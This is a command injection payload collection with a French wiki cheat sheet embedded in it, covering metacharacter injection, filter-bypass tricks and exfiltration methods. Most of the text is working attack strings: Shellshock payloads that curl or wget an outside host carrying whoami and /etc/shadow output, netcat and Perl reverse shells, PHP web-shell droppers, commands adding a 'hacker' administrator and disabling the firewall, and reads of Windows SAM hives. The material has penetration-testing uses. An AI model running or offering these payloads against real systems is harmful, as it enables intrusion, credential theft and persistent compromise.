system('wget https://xerosecurity.com/.testing/rce_vuln.txt');
system('whoami')
system('whoami');
test*; ls -lhtR /var/www/
test* || perl -e 'print "X"x16096'
test* | perl -e 'print "X"x16096'
test* & perl -e 'print "X"x16096'
test* && perl -e 'print "X"x16096'
test*; perl -e 'print "X"x16096'
$(`type C:\boot.ini`)
&&type C:\\boot.ini
| type C:\Windows\repair\SAM
; type C:\Windows\repair\SAM
& type C:\Windows\repair\SAM
&& type C:\Windows\repair\SAM
type C:\Windows\repair\SAM
| type C:\Windows\repair\SYSTEM
; type C:\Windows\repair\SYSTEM
& type C:\Windows\repair\SYSTEM
&& type C:\Windows\repair\SYSTEM
type C:\Windows\repair\SYSTEM
| type C:\WINNT\repair\SAM
; type C:\WINNT\repair\SAM
& type C:\WINNT\repair\SAM
&& type C:\WINNT\repair\SAM
type C:\WINNT\repair\SAM
type C:\WINNT\repair\SYSTEM
| type %SYSTEMROOT%\repair\SAM
; type %SYSTEMROOT%\repair\SAM
& type %SYSTEMROOT%\repair\SAM
&& type %SYSTEMROOT%\repair\SAM
type %SYSTEMROOT%\repair\SAM
| type %SYSTEMROOT%\repair\SYSTEM
; type %SYSTEMROOT%\repair\SYSTEM
& type %SYSTEMROOT%\repair\SYSTEM
&& type %SYSTEMROOT%\repair\SYSTEM
type %SYSTEMROOT%\repair\SYSTEM
uname
;uname;
| uname -a
; uname -a
& uname -a
&& uname -a
uname -a
|/usr/bin/id
;|/usr/bin/id|
;/usr/bin/id|
$;/usr/bin/id
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");'
() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11
| wget http://crowdshield.com/.testing/rce.txt
& wget http://crowdshield.com/.testing/rce.txt
; wget https://crowdshield.com/.testing/rce_vuln.txt
$(`wget https://crowdshield.com/.testing/rce_vuln.txt`)
&& wget https://crowdshield.com/.testing/rce_vuln.txt
wget https://crowdshield.com/.testing/rce_vuln.txt
$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
which curl
which gcc
which nc
which netcat
which perl
which python
which wget
whoami
| whoami
; whoami
' whoami
' || whoami
' & whoami
' && whoami
'; whoami
" whoami
" || whoami
" | whoami
" & whoami
" && whoami
"; whoami
$(`whoami`)
& whoami
&& whoami
{{ get_user_file("C:\boot.ini") }}
{{ get_user_file("/etc/hosts") }}
{{4+4}}
{{4+8}}
{{person.secret}}
{{person.name}}
{1} + {1}
{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}
{{[] .__ Class __.__ base __.__ subclasses __ ()}}

== Références ==
*https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
*https://github.com/payloadbox/command-injection-payload-list
*https://book.hacktricks.xyz/pentesting-web/command-injection

Web:Injection de Commandes

2023-12-02T17:49:17Z

OldNeib : /* Cheat Sheet */

Lors de l'exécution d'une commande en ligne prenant en paramètre une entrée utilisateur, il est parfois possible de s'évader du champ d'action prévu par l'ajout de certains caractères:
== Les Métacharacteres ==
; | Le point-virgule est le métacaractère le plus couramment utilisé pour tester une faille d'injection. Le shell exécute toutes les commandes séparées par le point-virgule.
& | Il sépare plusieurs commandes sur une ligne de commande. Il exécute la première commande puis la seconde.
&& | Si la commande précédente à && est réussie, alors seulement elle exécute la commande suivante.
| | Redirige les sorties standard de la première commande vers l'entrée standard de la deuxième commande.
|| | Le || n'exécute la commande suivante que si la commande précédente échoue.
`` | Le métacaractère "unquote" est utilisé pour forcer le shell à interpréter et à exécuter la commande à l'interieur. Ex: '$ Variable="OS version `uname -a`" && echo $variable'

Exemple simple de script PHP utilisant ping.
<?php
if(isset($_POST["ip"]) && !empty($_POST["ip"])){
$response = shell_exec("timeout 5 bash -c 'ping -c 3 ".$_POST["ip"]."'");
echo $response;
}
?>

Au lieu de fournir une ip, il est possible d'injecter une commade par l'utilisation des métacharacteres.
*127.0.0.1;ls -la
*;ls -la
*;ls%20-la
*;ls%09-la
*(...)

== Afficher le contenu d'un fichier PHP ==
L'injection de la commande ;php -s file.php va permettre d'afficher le contenu du fichier php plutôt que ;cat file.php qui risque lui d'être exécuté.

== Contournement de filtres ==
Si certain filtres sont en place, par exemple en supprimant les caractères d'évasion, on peut tenter un retour à la ligne via l'ajout de %0a.

La commande suivant le %0a sera alors exécutée.

=== Exemple de filtre maison ===
// Set blacklist
$substitutions = array(
'&' => '',
';' => '',
'| ' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);

On remarque le '| ', ce qui veut dire que le '|' n'est pas filtré s'il n'est pas suivi d'un espace. En y allant à taton on peut retrouver certaines règles.
*127.0;.0.1
*12&7.0.0.1
*(...)

Il est donc primordial de jouer avec les espaces!
*127.0.0.1|cat password.txt
*127.0.0.1 |cat password.txt
*127.0.0.1| cat password.txt
*(...)

Une commande possible serait donc:

127.0.0.1%0als -la

On peut se retrouver bloquer par l'encodage des caractères spéciaux via les formulaires web (127.0.0.1%250als -la), il semblerait que curl soit plus permissif, ou alors il faudrait modifier directement le header avant l'envoie de la requête.

=== Autre type de filtres ===
==== Double Encoding ====
Dans le cas oú l'on aurait quelque chose comme ça:

str_replace("%26", "")

On donc peut tenter un double encoding %%2626 deviendra alors %26.

==== Sans Espaces ====
Dans le cas oú les espaces serait supprimmés:

===== Le Bash Internal Field Separator: $IFS =====

;cat${IFS}/etc/passwd

===== SI IFS est blacklisté =====

;{cat,/etc/passwd}

===== Utilisation de TAB =====

;cat%09/etc/passwd

===== Line-Feed in the middle =====

;cat%0a/etc/passwd

===== Utilisation du '+' =====

;cat+/etc/passwd

===== Env Variable =====
;$var='x20';cat${var}/etc/passwd

===== Sans $ ni {} =====
;IFS=,;`cat<<</etc,/passwd`

==== Certains mots blacklistés ====
Si "cat" ou "passwd" ou "nimp" est blacklisté:

===== The Wildcard caracters =====

;/bin/cat /etc/passwd == ;/b*n/c /et*/pawd == ;/b?n/c?? /et?/pa??wd

===== Unitialized variable $u qui a une valeur nulle =====

;cat$u /etc$u/passwd

===== Null Variable =====

;cat /et``c/pas``swd
;cat /e$()tc/pa$()sswd
;cat /etc$(dlam)/pa$(erde)sswd

===== Troncation par quote, double quotes, ou backslash =====

;/bin/c"at" /e"tc"/pa"ss"wd
;/b'i'n/c'a't /e't'c/p'a's's'w'd'
;c\at /e\tc/pa\s\swd/

===== $@ =====
;c$@at /etc/passwd

==== Sans Slash ====
Si le slah est filtré on peut utilisé ${HOME:0;1} qui représente un slash:

;cat ${HOME:0;1}etc${HOME:0;1}passwd

==== ${SHELLOPTS} ====
De la même façon on peut utilisé ${SHELLOPTS} pour représenter un caractère spécifique:

${SHELLOPTS:3:1} représente un c.
${SHELLOPTS:2:1} représente un a.
(À creuser...)
;${SHELLOPTS:3:1}at /etc/p${SHELLOPTS:2:1}sswd

==== Reverse and Encode ====
;`echo "dwssap/cte/ tac | rev`
;$(echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d)

==== Hexadecimal encode ====

;echo -e "x2fx65x74x63x2fx70x61x73x73x77x64" # (/etc/passwd)

== Cheat Sheet ==
=== Top 25 des paramètres pouvant conduire à une injection ===
?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

=== Fonctions PHP vulnérables ===
system()
exec()
shell_exec()
open()
pcntl_exec()
ioctl_exec()
eio_syncfs()
proc_open()
popen()

Command Execution Function Filtered possible Bypass with encoding
system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()
Reverse quotation marks are identical shell_exec()

=== DATA Exfiltration ===
Il est parfois possible de ne pas avoir de retour de la commande injectée, on peut alors passer par une requête POST et s'envoyer n'importe quel fichier. ([https://requestcatcher.com/])

==== cURL ====
$ curl -d "ip=127.0.0.1%0acurl -d"@Any_File" -X POST "https://requestbin.net/r/dyc3s5m8"" -X POST http://exemple.com/index.php
$ curl -d "@file" -X POST http://domain.com

==== cURL avec FTP ====
$ curl -T file ftp://ip -user nick:pass

==== Netcat ====
$ nc -l -p {port} < {file to extract}

==== ICMP ====
Si l'hôte que vous visez a été renforcé et que des outils tels que netcat, wget et CURL ont été supprimés, vous pouvez encore utiliser certaines techniques. Essayez de faire en sorte que l'hôte envoie un ping à votre boîte et voyez si le protocole ICMP passe à travers les pare-feux qui interviennent. Si c'est le cas, et que l'hôte sous-jacent tourne sous Linux, nous pouvons exfiltrer des données dans les requêtes ICMP en utilisant l'indicateur -p. L'option -p vous permet de spécifier jusqu'à 16 octets de "pad". C'est là que nous stockerons les données que nous voulons exfiltrer.

Nous devons d'abord convertir le fichier en hexadécimal, puis spécifier les données à insérer dans le paquet. Ceci peut être fait avec la ligne suivante :
cat password.txt | xxd -p -c 16 | while read exfile; do ping -p $exfile -c 1 xxx.xxx.xxx.xxx; done

Avec Wireshark, nous pouvons observer les paquets contenant nos données. Vous pouvez écrire un script qui récupère les paquets et réassemble le fichier sur l'hôte.

==== DNS ====
De la même manière que ping, DNS peut également être utilisé pour exfiltrer des données. Cette fois, nous allons utiliser chaque ligne de données comme nom d'hôte d'une requête DNS. En surveillant le trafic sur notre machine, nous pouvons réassembler le fichier. Dans ce cas, la commande suivante est soumise dans le cadre de notre requête au serveur vulnérable :
cat password.txt | while read exfile; do host $exfile.contextis.com xxx.xxx.xxx.xxx; done
for i in $(cat password.txt); do host $i.hkj.com; done

Comme pour le ping, vous pouvez écrire un script pour récupérer les paquets DNS entrants et réassembler le fichier.

==== Time based data exfiltration ====
Extraction caractère par caractère :
$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s

$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s

==== Reverse Shell ====
Avec Netcat:
nc -L -p port -e cmd.exe (Windows)
nc -l -p port -e /bin/bash (*nix)

===== Se connecter =====
====== Netcat ======
$ nc {ip} {port}
$ nc {ip} {port} > output

(Windows)
type {file to extract} | nc -L -p {port}

====== wget ======
wget --post-data exfile=`cat /path/to/file` http://domain.com
wget --post-file file http://domain.com

====== Telnet ======
telnet ip port < file

=== Command Injection/Execution Cheat Sheet ===
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands

#Not execute but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
===== Unix =====




/index.html|id|
;id;
;id
;netstat -a;
;system('cat%20/etc/passwd')
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"
() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"
() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"
cat /etc/hosts
$(`cat /etc/passwd`)
cat /etc/passwd
%0Acat%20/etc/passwd
{{ get_user_file("/etc/passwd") }}



system('cat /etc/passwd');
<?php system("cat /etc/passwd");?>

===== Windows =====
`
||
|
;
'
'"
"
"'
&
&&
%0a
%0a%0d

%0Aid
%0a id %0a
%0Aid%0A
%0a ping -i 30 127.0.0.1 %0a
%0A/usr/bin/id
%0A/usr/bin/id%0A
%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
%20{${phpinfo()}}
%20{${sleep(20)}}
%20{${sleep(3)}}
a|id|
a;id|
a;id;
a;id\n
() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12
| curl http://crowdshield.com/.testing/rce.txt
& curl http://crowdshield.com/.testing/rce.txt
; curl https://crowdshield.com/.testing/rce_vuln.txt
&& curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
dir
| dir
; dir
$(`dir`)
& dir
&&dir
&& dir
| dir C:\
; dir C:\
& dir C:\
&& dir C:\
dir C:\
| dir C:\Documents and Settings\*
; dir C:\Documents and Settings\*
& dir C:\Documents and Settings\*
&& dir C:\Documents and Settings\*
dir C:\Documents and Settings\*
| dir C:\Users
; dir C:\Users
& dir C:\Users
&& dir C:\Users
dir C:\Users
;echo%20'<script>alert(1)</script>'
echo '<img src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>'// XXXXXXXXXXX
| echo "<?php include($_GET['page'])| ?>" > rfi.php
; echo "<?php include($_GET['page']); ?>" > rfi.php
& echo "<?php include($_GET['page']); ?>" > rfi.php
&& echo "<?php include($_GET['page']); ?>" > rfi.php
echo "<?php include($_GET['page']); ?>" > rfi.php
| echo "<?php system('dir $_GET['dir']')| ?>" > dir.php
; echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
&& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
| echo "<?php system($_GET['cmd'])| ?>" > cmd.php
; echo "<?php system($_GET['cmd']); ?>" > cmd.php
& echo "<?php system($_GET['cmd']); ?>" > cmd.php
&& echo "<?php system($_GET['cmd']); ?>" > cmd.php
echo "<?php system($_GET['cmd']); ?>" > cmd.php
;echo '<script>alert(1)</script>'
echo '<script>alert(1)</script>'// XXXXXXXXXXX
echo '<script src=https://crowdshield.com/.testing/xss.js></script>'// XXXXXXXXXXX
| echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
() { :;}; echo vulnerable 10
eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
eval('ls')
eval('pwd')
eval('pwd');
eval('sleep 5')
eval('sleep 5');
eval('whoami')
eval('whoami');
exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
exec('ls')
exec('pwd')
exec('pwd');
exec('sleep 5')
exec('sleep 5');
exec('whoami')
exec('whoami');
;{$_GET["cmd"]}
`id`
|id
| id
;id
;id|
;id;
& id
&&id
;id\n
ifconfig
| ifconfig
; ifconfig
& ifconfig
&& ifconfig
/index.html|id|
ipconfig
| ipconfig /all
; ipconfig /all
& ipconfig /all
&& ipconfig /all
ipconfig /all
ls
$(`ls`)
| ls -l /
; ls -l /
& ls -l /
&& ls -l /
ls -l /
| ls -laR /etc
; ls -laR /etc
& ls -laR /etc
&& ls -laR /etc
| ls -laR /var/www
; ls -laR /var/www
& ls -laR /var/www
&& ls -laR /var/www
| ls -l /etc/
; ls -l /etc/
& ls -l /etc/
&& ls -l /etc/
ls -l /etc/
ls -lh /etc/
| ls -l /home/*
; ls -l /home/*
& ls -l /home/*
&& ls -l /home/*
ls -l /home/*
*; ls -lhtR /var/www/
| ls -l /tmp
; ls -l /tmp
& ls -l /tmp
&& ls -l /tmp
ls -l /tmp
| ls -l /var/www/*
; ls -l /var/www/*
& ls -l /var/www/*
&& ls -l /var/www/*
ls -l /var/www/*
\n
\n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\`
\n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\`
\n/bin/ls -al\n
| nc -lvvp 4444 -e /bin/sh|
; nc -lvvp 4444 -e /bin/sh;
& nc -lvvp 4444 -e /bin/sh&
&& nc -lvvp 4444 -e /bin/sh &
nc -lvvp 4444 -e /bin/sh
nc -lvvp 4445 -e /bin/sh &
nc -lvvp 4446 -e /bin/sh|
nc -lvvp 4447 -e /bin/sh;
nc -lvvp 4448 -e /bin/sh&
\necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n
\necho INJECTX\nexit\n\033[2Asleep 5\n
\necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n
| net localgroup Administrators hacker /ADD
; net localgroup Administrators hacker /ADD
& net localgroup Administrators hacker /ADD
&& net localgroup Administrators hacker /ADD
net localgroup Administrators hacker /ADD
| netsh firewall set opmode disable
; netsh firewall set opmode disable
& netsh firewall set opmode disable
&& netsh firewall set opmode disable
netsh firewall set opmode disable
netstat
;netstat -a;
| netstat -an
; netstat -an
& netstat -an
&& netstat -an
netstat -an
| net user hacker Password1 /ADD
; net user hacker Password1 /ADD
& net user hacker Password1 /ADD
&& net user hacker Password1 /ADD
net user hacker Password1 /ADD
| net view
; net view
& net view
&& net view
net view
\nid|
\nid;
\nid\n
\n/usr/bin/id\n
perl -e 'print "X"x1024'
|| perl -e 'print "X"x16096'
| perl -e 'print "X"x16096'
; perl -e 'print "X"x16096'
& perl -e 'print "X"x16096'
&& perl -e 'print "X"x16096'
perl -e 'print "X"x16384'
; perl -e 'print "X"x2048'
& perl -e 'print "X"x2048'
&& perl -e 'print "X"x2048'
perl -e 'print "X"x2048'
|| perl -e 'print "X"x4096'
| perl -e 'print "X"x4096'
; perl -e 'print "X"x4096'
& perl -e 'print "X"x4096'
&& perl -e 'print "X"x4096'
perl -e 'print "X"x4096'
|| perl -e 'print "X"x8096'
| perl -e 'print "X"x8096'
; perl -e 'print "X"x8096'
&& perl -e 'print "X"x8096'
perl -e 'print "X"x8192'
perl -e 'print "X"x81920'
|| phpinfo()
| phpinfo()
{${phpinfo()}}
;phpinfo()
;phpinfo();//
';phpinfo();//
{${phpinfo()}}
& phpinfo()
&& phpinfo()
phpinfo()
phpinfo();
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?req=df2fkjj");?>
